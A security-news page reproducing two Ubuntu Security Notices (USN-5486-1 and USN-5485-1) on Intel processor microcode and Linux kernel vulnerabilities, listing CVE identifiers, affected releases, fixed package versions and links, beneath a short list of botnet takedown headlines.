*   Microsoft takes down largest botnet network “Necurs”
*   World’s Most ‘Resilient Malware’ Botnet Emotet Taken Down
*   The US jails Russian hacker for 8 years over botnet, bank fraud
*   Hacker disrupts Emotet botnet operation by replacing payload with GIFs
*   FBI Disrupts Cyclops Blink Botnet Used by Russian Intelligence Directorate

Feds Dismantle Russian Rsocks Botnet Powered by Millions of IoT Devices

Ubuntu Security Notice 5486-1 - It was discovered that some Intel processors did not implement sufficient control flow management. A local attacker could use this to cause a denial of service. Joseph Nuzman discovered that some Intel processors did not properly initialise shared resources. A local attacker could use this to obtain sensitive information. Mark Ermolov, Dmitry Sklyarov and Maxim Goryachy discovered that some Intel processors did not prevent test and debug logic from being activated at runtime. A local attacker could use this to escalate privileges.

==========================================================================  
Ubuntu Security Notice USN-5486-1  
June 20, 2022

intel-microcode vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 21.10  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in Intel Microcode.

Software Description:  
- intel-microcode: Processor microcode for Intel CPUs

Details:

It was discovered that some Intel processors did not implement sufficient  
control flow management. A local attacker could use this to cause a denial  
of service. (CVE-2021-0127)

Joseph Nuzman discovered that some Intel processors did not properly  
initialise shared resources. A local attacker could use this to obtain  
sensitive information. (CVE-2021-0145)

Mark Ermolov, Dmitry Sklyarov and Maxim Goryachy discovered that some Intel  
processors did not prevent test and debug logic from being activated at  
runtime. A local attacker could use this to escalate  
privileges. (CVE-2021-0146)

It was discovered that some Intel processors did not properly restrict  
access in some situations. A local attacker could use this to obtain  
sensitive information. (CVE-2021-33117)

Brandon Miller discovered that some Intel processors did not properly  
restrict access in some situations. A local attacker could use this to  
obtain sensitive information or a remote attacker could use this to cause a  
denial of service. (CVE-2021-33120)

It was discovered that some Intel processors did not completely perform  
cleanup actions on multi-core shared buffers. A local attacker could  
possibly use this to expose sensitive information. (CVE-2022-21123,  
CVE-2022-21127)

Alysa Milburn, Jason Brandt, Avishai Redelman and Nir Lavi discovered that  
some Intel processors improperly optimised security-critical code. A local  
attacker could possibly use this to expose sensitive  
information. (CVE-2022-21151)

It was discovered that some Intel processors did not properly perform  
cleanup during specific special register write operations. A local attacker  
could possibly use this to expose sensitive information. (CVE-2022-21166)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
  intel-microcode                 3.20220510.0ubuntu0.22.04.1

Ubuntu 21.10:  
  intel-microcode                 3.20220510.0ubuntu0.21.10.1

Ubuntu 20.04 LTS:  
  intel-microcode                 3.20220510.0ubuntu0.20.04.1

Ubuntu 18.04 LTS:  
  intel-microcode                 3.20220510.0ubuntu0.18.04.1

After a standard system update you need to reboot your computer to make  
all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-5486-1  
  CVE-2021-0127, CVE-2021-0145, CVE-2021-0146, CVE-2021-33117,  
  CVE-2021-33120, CVE-2022-21123, CVE-2022-21127, CVE-2022-21151,  
  CVE-2022-21166

Package Information:  
  https://launchpad.net/ubuntu/+source/intel-microcode/3.20220510.0ubuntu0.22.04.1  
  https://launchpad.net/ubuntu/+source/intel-microcode/3.20220510.0ubuntu0.21.10.1  
  https://launchpad.net/ubuntu/+source/intel-microcode/3.20220510.0ubuntu0.20.04.1  
  https://launchpad.net/ubuntu/+source/intel-microcode/3.20220510.0ubuntu0.18.04.1

Ubuntu Security Notice USN-5486-1

Ubuntu Security Notice 5485-1 - It was discovered that some Intel processors did not completely perform cleanup actions on multi-core shared buffers. A local attacker could possibly use this to expose sensitive information. It was discovered that some Intel processors did not completely perform cleanup actions on microarchitectural fill buffers. A local attacker could possibly use this to expose sensitive information. It was discovered that some Intel processors did not properly perform cleanup during specific special register write operations. A local attacker could possibly use this to expose sensitive information.

    ==========================================================================Ubuntu Security Notice USN-5485-1June 17, 2022linux, linux-aws, linux-aws-hwe, linux-aws-5.13, linux-aws-5.4,linux-azure, linux-azure-4.15, linux-azure-5.13, linux-azure-5.4,linux-azure-fde, linux-dell300x, linux-gcp, linux-gcp-4.15,linux-gcp-5.13, linux-gcp-5.4, linux-gke, linux-gke-5.4, linux-gkeop,linux-gkeop-5.4, linux-hwe, linux-hwe-5.13, linux-hwe-5.4, linux-ibm,linux-ibm-5.4, linux-intel-5.13, linux-intel-iotg, linux-kvm,linux-lowlatency, linux-oracle, linux-oracle-5.13, linux-oracle-5.4vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 21.10- Ubuntu 20.04 LTS- Ubuntu 18.04 LTS- Ubuntu 16.04 ESM- Ubuntu 14.04 ESMSummary:Several security issues were addressed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke: Linux kernel for Google Container Engine (GKE) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-intel-iotg: Linux kernel for Intel IoT platforms- linux-kvm: Linux kernel for cloud environments- linux-lowlatency: Linux low latency kernel- linux-oracle: Linux kernel for Oracle Cloud systems- linux-aws-5.13: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-5.13: Linux kernel for Microsoft Azure cloud systems- linux-azure-fde: Linux kernel for Microsoft Azure cloud systems- linux-gcp-5.13: Linux kernel for Google Cloud Platform (GCP) systems- linux-gkeop: Linux kernel for Google Container Engine (GKE) systems- linux-hwe-5.13: Linux hardware enablement (HWE) kernel- linux-intel-5.13: Linux kernel for Intel IOTG- linux-oracle-5.13: Linux kernel for Oracle Cloud systems- linux-aws-5.4: Linux kernel for Amazon Web Services (AWS) systems- linux-azure-4.15: Linux kernel for Microsoft Azure Cloud systems- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systems- linux-dell300x: Linux kernel for Dell 300x platforms- linux-gcp-4.15: Linux kernel for Google Cloud Platform (GCP) systems- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems- linux-gke-5.4: Linux kernel for Google Container Engine (GKE) systems- linux-gkeop-5.4: Linux kernel for Google Container Engine (GKE) systems- linux-hwe-5.4: Linux hardware enablement (HWE) kernel- linux-ibm-5.4: Linux kernel for IBM cloud systems- linux-oracle-5.4: Linux kernel for Oracle Cloud systems- linux-aws-hwe: Linux kernel for Amazon Web Services (AWS-HWE) systems- linux-hwe: Linux hardware enablement (HWE) kernelDetails:It was discovered that some Intel processors did not completely performcleanup actions on multi-core shared buffers. A local attacker couldpossibly use this to expose sensitive information. (CVE-2022-21123)It was discovered that some Intel processors did not completely performcleanup actions on microarchitectural fill buffers. A local attacker couldpossibly use this to expose sensitive information. (CVE-2022-21125)It was discovered that some Intel processors did not properly performcleanup during specific special register write operations. A local attackercould possibly use this to expose sensitive information. (CVE-2022-21166)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  linux-image-5.15.0-1009-ibm     5.15.0-1009.11  linux-image-5.15.0-1010-gcp     5.15.0-1010.15  linux-image-5.15.0-1010-gke     5.15.0-1010.13  linux-image-5.15.0-1010-intel-iotg  5.15.0-1010.14  linux-image-5.15.0-1011-oracle  5.15.0-1011.15  linux-image-5.15.0-1012-azure   5.15.0-1012.15  linux-image-5.15.0-1012-kvm     5.15.0-1012.14  linux-image-5.15.0-1013-aws     5.15.0-1013.17  linux-image-5.15.0-39-generic   5.15.0-39.42  linux-image-5.15.0-39-generic-64k  5.15.0-39.42  linux-image-5.15.0-39-generic-lpae  5.15.0-39.42  linux-image-5.15.0-39-lowlatency  5.15.0-39.42  linux-image-5.15.0-39-lowlatency-64k  5.15.0-39.42  linux-image-aws                 5.15.0.1013.13  linux-image-azure               5.15.0.1012.11  linux-image-gcp                 5.15.0.1010.9  linux-image-generic             5.15.0.39.40  linux-image-generic-hwe-22.04   5.15.0.39.40  linux-image-generic-lpae        5.15.0.39.40  linux-image-generic-lpae-hwe-22.04  5.15.0.39.40  linux-image-gke                 5.15.0.1010.13  linux-image-gke-5.15            5.15.0.1010.13  linux-image-ibm                 5.15.0.1009.8  linux-image-intel-iotg          5.15.0.1010.10  linux-image-kvm                 5.15.0.1012.10  linux-image-lowlatency          5.15.0.39.38  linux-image-lowlatency-hwe-22.04  5.15.0.39.38  linux-image-oem-20.04           5.15.0.39.40  linux-image-oracle              5.15.0.1011.9  linux-image-virtual             5.15.0.39.40  linux-image-virtual-hwe-22.04   5.15.0.39.40Ubuntu 21.10:  linux-image-5.13.0-1030-kvm     5.13.0-1030.33  linux-image-5.13.0-1031-aws     5.13.0-1031.35  linux-image-5.13.0-1031-azure   5.13.0-1031.37  linux-image-5.13.0-1033-gcp     5.13.0-1033.40  linux-image-5.13.0-1036-oracle  5.13.0-1036.43  linux-image-5.13.0-51-generic   5.13.0-51.58  linux-image-5.13.0-51-generic-lpae  5.13.0-51.58  linux-image-5.13.0-51-lowlatency  5.13.0-51.58  linux-image-aws                 5.13.0.1031.29  linux-image-azure               5.13.0.1031.28  linux-image-gcp                 5.13.0.1033.28  linux-image-generic             5.13.0.51.57  linux-image-generic-lpae        5.13.0.51.57  linux-image-gke                 5.13.0.1033.28  linux-image-kvm                 5.13.0.1030.27  linux-image-lowlatency          5.13.0.51.57  linux-image-oem-20.04           5.13.0.51.57  linux-image-oracle              5.13.0.1036.33  linux-image-virtual             5.13.0.51.57Ubuntu 20.04 LTS:  linux-image-5.13.0-1017-intel   5.13.0-1017.19  linux-image-5.13.0-1031-aws     5.13.0-1031.35~20.04.1  linux-image-5.13.0-1031-azure   5.13.0-1031.37~20.04.1  linux-image-5.13.0-1033-gcp     5.13.0-1033.40~20.04.1  linux-image-5.13.0-1036-oracle  5.13.0-1036.43~20.04.1  linux-image-5.13.0-51-generic   5.13.0-51.58~20.04.1  linux-image-5.13.0-51-generic-64k  5.13.0-51.58~20.04.1  linux-image-5.13.0-51-generic-lpae  5.13.0-51.58~20.04.1  linux-image-5.13.0-51-lowlatency  5.13.0-51.58~20.04.1  linux-image-5.4.0-1028-ibm      5.4.0-1028.32  linux-image-5.4.0-1048-gkeop    5.4.0-1048.51  linux-image-5.4.0-1070-kvm      5.4.0-1070.75  linux-image-5.4.0-1076-gke      5.4.0-1076.82  linux-image-5.4.0-1078-oracle   5.4.0-1078.86  linux-image-5.4.0-1080-aws      5.4.0-1080.87  linux-image-5.4.0-1080-gcp      5.4.0-1080.87  linux-image-5.4.0-1085-azure    5.4.0-1085.90  linux-image-5.4.0-1085-azure-fde  5.4.0-1085.90+cvm1.1  linux-image-5.4.0-120-generic   5.4.0-120.136  linux-image-5.4.0-120-generic-lpae  5.4.0-120.136  linux-image-5.4.0-120-lowlatency  5.4.0-120.136  linux-image-aws                 5.13.0.1031.35~20.04.25  linux-image-aws-lts-20.04       5.4.0.1080.80  linux-image-azure               5.13.0.1031.37~20.04.20  linux-image-azure-fde           5.4.0.1085.90+cvm1.25  linux-image-azure-lts-20.04     5.4.0.1085.82  linux-image-gcp                 5.13.0.1033.40~20.04.1  linux-image-gcp-lts-20.04       5.4.0.1080.86  linux-image-generic             5.4.0.120.121  linux-image-generic-hwe-20.04   5.13.0.51.58~20.04.31  linux-image-generic-lpae        5.4.0.120.121  linux-image-generic-lpae-hwe-20.04  5.13.0.51.58~20.04.31  linux-image-gke                 5.4.0.1076.84  linux-image-gke-5.4             5.4.0.1076.84  linux-image-gkeop               5.4.0.1048.49  linux-image-gkeop-5.4           5.4.0.1048.49  linux-image-ibm                 5.4.0.1028.25  linux-image-ibm-lts-20.04       5.4.0.1028.25  linux-image-intel               5.13.0.1017.15  linux-image-kvm                 5.4.0.1070.67  linux-image-lowlatency          5.4.0.120.121  linux-image-lowlatency-hwe-20.04  5.13.0.51.58~20.04.31  linux-image-oem                 5.4.0.120.121  linux-image-oem-osp1            5.4.0.120.121  linux-image-oracle              5.13.0.1036.43~20.04.1  linux-image-oracle-lts-20.04    5.4.0.1078.76  linux-image-virtual             5.4.0.120.121  linux-image-virtual-hwe-20.04   5.13.0.51.58~20.04.31Ubuntu 18.04 LTS:  linux-image-4.15.0-1048-dell300x  4.15.0-1048.53  linux-image-4.15.0-1101-oracle  4.15.0-1101.112  linux-image-4.15.0-1122-kvm     4.15.0-1122.127  linux-image-4.15.0-1130-gcp     4.15.0-1130.146  linux-image-4.15.0-1136-aws     4.15.0-1136.147  linux-image-4.15.0-1145-azure   4.15.0-1145.160  linux-image-4.15.0-187-generic  4.15.0-187.198  linux-image-4.15.0-187-generic-lpae  4.15.0-187.198  linux-image-4.15.0-187-lowlatency  4.15.0-187.198  linux-image-5.4.0-1028-ibm      5.4.0-1028.32~18.04.1  linux-image-5.4.0-1048-gkeop    5.4.0-1048.51~18.04.1  linux-image-5.4.0-1076-gke      5.4.0-1076.82~18.04.1  linux-image-5.4.0-1078-oracle   5.4.0-1078.86~18.04.1  linux-image-5.4.0-1080-aws      5.4.0-1080.87~18.04.1  linux-image-5.4.0-1080-gcp      5.4.0-1080.87~18.04.1  linux-image-5.4.0-1085-azure    5.4.0-1085.90~18.04.1  linux-image-5.4.0-120-generic   5.4.0-120.136~18.04.1  linux-image-5.4.0-120-generic-lpae  5.4.0-120.136~18.04.1  linux-image-5.4.0-120-lowlatency  5.4.0-120.136~18.04.1  linux-image-aws                 5.4.0.1080.60  linux-image-aws-lts-18.04       4.15.0.1136.136  linux-image-azure               5.4.0.1085.62  linux-image-azure-lts-18.04     4.15.0.1145.115  linux-image-dell300x            4.15.0.1048.48  linux-image-gcp                 5.4.0.1080.61  linux-image-gcp-lts-18.04       4.15.0.1130.146  linux-image-generic             4.15.0.187.173  linux-image-generic-hwe-18.04   5.4.0.120.136~18.04.100  linux-image-generic-lpae        4.15.0.187.173  linux-image-generic-lpae-hwe-18.04  5.4.0.120.136~18.04.100  linux-image-gke-5.4             5.4.0.1076.82~18.04.38  linux-image-gkeop-5.4           5.4.0.1048.51~18.04.45  linux-image-ibm                 5.4.0.1028.42  linux-image-kvm                 4.15.0.1122.115  linux-image-lowlatency          4.15.0.187.173  linux-image-lowlatency-hwe-18.04  5.4.0.120.136~18.04.100  linux-image-oem                 5.4.0.120.136~18.04.100  linux-image-oem-osp1            5.4.0.120.136~18.04.100  linux-image-oracle              5.4.0.1078.86~18.04.55  linux-image-oracle-lts-18.04    4.15.0.1101.108  linux-image-snapdragon-hwe-18.04  5.4.0.120.136~18.04.100  linux-image-virtual             4.15.0.187.173  linux-image-virtual-hwe-18.04   5.4.0.120.136~18.04.100Ubuntu 16.04 ESM:  linux-image-4.15.0-1101-oracle  4.15.0-1101.112~16.04.1  linux-image-4.15.0-1130-gcp     4.15.0-1130.146~16.04.1  linux-image-4.15.0-1136-aws-hwe  4.15.0-1136.147~16.04.1  linux-image-4.15.0-1145-azure   4.15.0-1145.160~16.04.1  linux-image-4.15.0-187-generic  4.15.0-187.198~16.04.1  linux-image-4.15.0-187-lowlatency  4.15.0-187.198~16.04.1  linux-image-aws-hwe             4.15.0.1136.123  linux-image-azure               4.15.0.1145.132  linux-image-gcp                 4.15.0.1130.127  linux-image-generic-hwe-16.04   4.15.0.187.174  linux-image-gke                 4.15.0.1130.127  linux-image-lowlatency-hwe-16.04  4.15.0.187.174  linux-image-oem                 4.15.0.187.174  linux-image-oracle              4.15.0.1101.86  linux-image-virtual-hwe-16.04   4.15.0.187.174Ubuntu 14.04 ESM:  linux-image-4.15.0-1145-azure   4.15.0-1145.160~14.04.1  linux-image-azure               4.15.0.1145.114Please note that fully mitigating processor vulnerabilities requirescorresponding processor microcode/firmware updates.After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-5485-1  CVE-2022-21123, CVE-2022-21125, CVE-2022-21166Package Information:  https://launchpad.net/ubuntu/+source/linux/5.15.0-39.42  https://launchpad.net/ubuntu/+source/linux-aws/5.15.0-1013.17  https://launchpad.net/ubuntu/+source/linux-azure/5.15.0-1012.15  https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1010.15  https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1010.13  https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1009.11  https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1010.14  https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1012.14  https://launchpad.net/ubuntu/+source/linux-lowlatency/5.15.0-39.42  https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1011.15  https://launchpad.net/ubuntu/+source/linux/5.13.0-51.58  https://launchpad.net/ubuntu/+source/linux-aws/5.13.0-1031.35  https://launchpad.net/ubuntu/+source/linux-azure/5.13.0-1031.37  https://launchpad.net/ubuntu/+source/linux-gcp/5.13.0-1033.40  https://launchpad.net/ubuntu/+source/linux-kvm/5.13.0-1030.33  https://launchpad.net/ubuntu/+source/linux-oracle/5.13.0-1036.43  https://launchpad.net/ubuntu/+source/linux/5.4.0-120.136  https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1080.87  https://launchpad.net/ubuntu/+source/linux-aws-5.13/5.13.0-1031.35~20.04.1  https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1085.90  https://launchpad.net/ubuntu/+source/linux-azure-5.13/5.13.0-1031.37~20.04.1  https://launchpad.net/ubuntu/+source/linux-azure-fde/5.4.0-1085.90+cvm1.1  https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1080.87  https://launchpad.net/ubuntu/+source/linux-gcp-5.13/5.13.0-1033.40~20.04.1  https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1076.82  https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1048.51  https://launchpad.net/ubuntu/+source/linux-hwe-5.13/5.13.0-51.58~20.04.1  https://launchpad.net/ubuntu/+source/linux-ibm/5.4.0-1028.32  https://launchpad.net/ubuntu/+source/linux-intel-5.13/5.13.0-1017.19  https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1070.75  https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1078.86  https://launchpad.net/ubuntu/+source/linux-oracle-5.13/5.13.0-1036.43~20.04.1  https://launchpad.net/ubuntu/+source/linux/4.15.0-187.198  https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1136.147  https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1080.87~18.04.1  https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1145.160  https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1085.90~18.04.1  https://launchpad.net/ubuntu/+source/linux-dell300x/4.15.0-1048.53  https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1130.146  https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1080.87~18.04.1  https://launchpad.net/ubuntu/+source/linux-gke-5.4/5.4.0-1076.82~18.04.1  https://launchpad.net/ubuntu/+source/linux-gkeop-5.4/5.4.0-1048.51~18.04.1  https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-120.136~18.04.1  https://launchpad.net/ubuntu/+source/linux-ibm-5.4/5.4.0-1028.32~18.04.1  https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1122.127  https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1101.112  https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1078.86~18.04.1

Tag

#intel